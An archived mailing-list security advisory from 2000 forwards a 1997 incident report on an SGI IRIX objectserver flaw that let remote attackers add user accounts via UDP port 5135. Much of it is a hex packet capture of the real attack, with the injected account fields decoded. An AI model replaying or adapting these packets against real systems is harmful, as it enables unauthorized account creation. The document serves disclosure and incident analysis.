The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Objectserver vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 29 Mar 2000 08:52:06 EST
From: "Howard M. Kash III" <[email protected]>
To: [email protected]
Subject: Objectserver vulnerability

Since the patches are now officially released, I feel I can finally
release the details of the SGI objectserver vulnerability.  This
vulnerability was initailly reported to CERT and SGI Security on
October 6, 1997.  A beta version of patch 2849 was provided in
February 1998.


Howard


----- Forwarded message # 1:

Date:     Mon, 6 Oct 97 7:09:51 EDT
From:     "Howard M. Kash III"
To:       [email protected], [email protected]
Subject:  URGENT - new SGI vulnerability


-----BEGIN PGP SIGNED MESSAGE-----


URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT

SGI objectserver vulnerabilty allows remote users to create accounts.

Yesterday two of our hosts were compromised by an (as far as I could
determine) unknown, unpatched bug in SGI's objectserver.  The attack
consisted of sending UDP packets to port 5135 (see below).  The
result was a non-root account being added to the system.  The two
compromised hosts were running IRIX 6.2, but the vulnerability may
affect other versions of IRIX.  The vulnerability does not appear to
give root access directly, as the attackers used other IRIX
vulnerabilities to gain root access after logging into the new
account.

Attached are the UDP packets exchanged between the attacking host
(aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt).  IP
addresses have been masked to protect the guilty - I mean innocent
until proven guilty.  The result of this sequence of packets is the
following line added to /etc/passwd:

    gueust:x:5002:20:LsD:/tmp/.new:/bin/csh

An entry must also be added to /etc/shadow since the attacker then
logs into the new account with a password.

As a temporary measure we have blocked all traffic to port 5135 at
our gateway.


Howard Kash
U.S. Army Research Lab

- ------------------------------------------------------------------------

TCP and UDP headers have been separated out.  I've decoded some of the
packet contents into its ascii equivalent below the line.

16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
                         4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
                         tttt tttt
				   112a 140f 003c 6516
						       0001 0000
                         0001 0000 0000 0024 0000 0000 2103 0043
                         000a 000a 0101 3b01 6e00 0080 4301 0118
                         0b01 013b 016e 0102 0103 0001 0107 0101
16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
                         4500 007b 0644 0000 3a11 26dc tttt tttt
                         aaaa aaaa
				   140f 112a 0067 0d37
						       0001 0186
                         0001 0000 0000 004f 0000 0000 2903 0043
                         000a 0080 4300 8043 0105 0a01 013b 0178
                         0469 0a79 9a01 330a 0101 3b01 7804 690a
                         799a 0138 0a01 013b 0178 0469 0a79 9a01
                         020a 0101 3b01 7804 690a 799a 0103 0a01
                         013b 0178 0469 0a79 9a01 04
16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
                         4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
                         tttt tttt
				   112a 140f 0140 a1b2
						       0001 0000
                         0001 0000 0000 0128 0000 0000 1c03 0043
                         0201 1d0a 0101 3b01 7804 690a 799a 0102
                         0a01 013b 0178 0000 8043 0110 170b 0101
                         3b01 6e01 0101 0943 0106 6775 6575 7374
			                          g u  e u  s t
                         170b 0101 3b01 0201 0101 0943 0103 4c73
			                                    L s
                         4417 0b01 013b 016e 0106 0109 4300 170b
			 D
                         0101 3b01 6e01 0701 0943 0017 0b01 013b
                         0102 0103 0109 4300 170b 0101 3b01 6e01
                         0901 0943 0017 0b01 013b 016e 010d 0109
                         4300 170b 0101 3b01 6e01 1001 0943 0017
                         0b01 013b 016e 010a 0109 4300 170b 0101
                         3b01 6e01 0e01 0301 0917 0b01 013b 016e
                         0104 0109 4301 0d61 6b46 4a64 7865 6e4b
                         6e79 532e 170b 0101 3b01 6e01 1101 0943
                         0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
			      / t  m p  / .  n e  w
                         016e 0112 0109 4301 0470 6f6f 7417 0b01
                         013b 016e 0102 0103 0017 0b01 013b 016e
                         0113 0109 4301 082f 6269 6e2f 6373 6817
			                  /  b i  n /  c s  h
                         0b01 013b 016e 010f 0109 4301 074c 7344
                         2f43 5444
16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
                         4500 0045 0646 0000 3a11 2710 tttt tttt
                         aaaa aaaa
				   140f 112a 0031 0ef5
						       0001 0187
                         0001 0000 0000 0019 0000 0000 2503 0043
                         0201 1d0a 0080 4300 0a01 013b 0178 0469
                         0a79 9a01 39
16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
                         4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
                         tttt tttt
				   112f 140f 003c 6511
						       0001 0000
                         0001 0000 0000 0024 0000 0000 2103 0043
                         000a 000a 0101 3b01 6e00 0080 4301 0118
                         0b01 013b 016e 0102 0103 0001 0107 0101
16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
                         4500 0088 0669 0000 3a11 26aa tttt tttt
                         aaaa aaaa
				   140f 112f 0074 3f4f
						       0001 0188
                         0001 0000 0000 005c 0000 0000 2903 0043
                         000a 0080 4300 8043 0106 0a01 013b 0178
                         0469 0a79 9a01 330a 0101 3b01 7804 690a
                         799a 0138 0a01 013b 0178 0469 0a79 9a01
                         390a 0101 3b01 7804 690a 799a 0102 0a01
                         013b 0178 0469 0a79 9a01 030a 0101 3b01
                         7804 690a 799a 0104
16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
                         4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
                         tttt tttt
				   112f 140f 0142 1399
						       0001 0000
                         0001 0000 0000 012a 0000 0000 1c03 0043
                         0201 1d0a 0101 3b01 7804 690a 799a 0102
                         0a01 013b 0178 0000 8043 0110 170b 0101
                         3b01 6e01 0101 0943 0106 6775 6575 7374
                         170b 0101 3b01 0201 0101 0943 0103 4c73
                         4417 0b01 013b 016e 0106 0109 4300 170b
                         0101 3b01 6e01 0701 0943 0017 0b01 013b
                         0102 0103 0109 4300 170b 0101 3b01 6e01
                         0901 0943 0017 0b01 013b 016e 010d 0109
                         4300 170b 0101 3b01 6e01 1001 0943 0017
                         0b01 013b 016e 010a 0109 4300 170b 0101
                         3b01 6e01 0e01 0301 0917 0b01 013b 016e
                         0104 0109 4301 0d61 6b46 4a64 7865 6e4b
                         6e79 532e 170b 0101 3b01 6e01 1101 0943
                         0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
                         016e 0112 0109 4301 0475 7365 7217 0b01
                         013b 016e 0102 0103 0213 8a17 0b01 013b
                         016e 0113 0109 4301 082f 6269 6e2f 6373
                         6817 0b01 013b 016e 010f 0109 4301 074c
                         7344 2f43 5444
16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
                         4500 0045 0671 0000 3a11 26e5 tttt tttt
                         aaaa aaaa
				   140f 112f 0031 0dee
						       0001 0189
                         0001 0000 0000 0019 0000 0000 2503 0043
                         0201 1d0a 0080 4300 0a01 013b 0178 0469
                         0a79 9a01 3a

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----


----- End of forwarded messages

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру